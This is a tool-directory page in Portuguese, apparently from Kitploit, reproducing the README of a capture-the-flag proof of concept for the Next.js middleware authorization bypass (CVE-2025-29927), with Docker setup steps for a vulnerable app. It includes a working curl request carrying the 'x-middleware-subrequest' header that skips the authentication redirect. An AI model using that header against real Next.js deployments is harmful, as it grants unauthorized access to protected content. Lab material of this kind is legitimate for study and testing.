Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29927 — Prova de conceito estilo CTF demonstrando o bypass de autorização de middleware do Next.js CVE-2025-29927. Inclui aplicativo Docker vulnerável e script de exploit para recuperar a flag de rota protegida. | Kitploit
Ferramentas/GitHubGitHub/mhamzakhattak/cve-2025-29927
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

Prova de conceito estilo CTF demonstrando o bypass de autorização de middleware do Next.js CVE-2025-29927. Inclui aplicativo Docker vulnerável e script de exploit para recuperar a flag de rota protegida.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-29927 - Bypass de Autorização no Middleware do Next.js (PoC)

Este é um Proof of Concept (PoC) no estilo Capture The Flag (CTF) para a vulnerabilidade Bypass de Autorização no Middleware do Next.js (CVE-2025-29927). O objetivo é contornar o middleware de autenticação e recuperar a flag da rota /protected.


Resumo da Vulnerabilidade

  • CVE: CVE-2025-29927
  • Tipo: Bypass de Autorização
  • Componente: Middleware do Next.js
  • Impacto: Acesso não autorizado a rotas protegidas
  • Rota Alvo do PoC: /protected
  • Comportamento Esperado: Usuários não autorizados são redirecionados para /
  • Comportamento Vulnerável: Usar uma requisição maliciosa permite contornar o redirecionamento e acessar o conteúdo protegido diretamente

Configuração do PoC

1. Clone o Repositório

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. Construa e Execute o Aplicativo Vulnerável

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

Isso iniciará o aplicativo Next.js vulnerável em http://IP:3000


Exploração

1. Sem Exploit

Tente acessar:

root@kitploit:~
curl -i http://IP:3000/protected

Você será redirecionado para /.

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. Com Exploit

Use o exploit.py fornecido para contornar o middleware e acessar a rota protegida:

root@kitploit:~
python3 exploit.py -url http://IP:3000

Se for bem-sucedido, você recuperará a flag de /protected.


Arquivos

  • Dockerfile - Constrói o aplicativo Next.js vulnerável
  • exploit.py - Explora a vulnerabilidade para contornar a autenticação
  • pages/ - Contém as rotas vulneráveis /protected e /login
  • middleware.js - A lógica do middleware vulnerável
  • README.md - Este arquivo

Aviso Legal

Este PoC é apenas para fins educacionais e de pesquisa. Não o utilize contra sistemas que você não possui ou para os quais não tem permissão explícita de teste.


🏁 Flag

Encontre a flag explorando a vulnerabilidade e acessando:

root@kitploit:~
http://IP:3000/protected

Boa sorte! 🏴‍☠️

Baixar ferramenta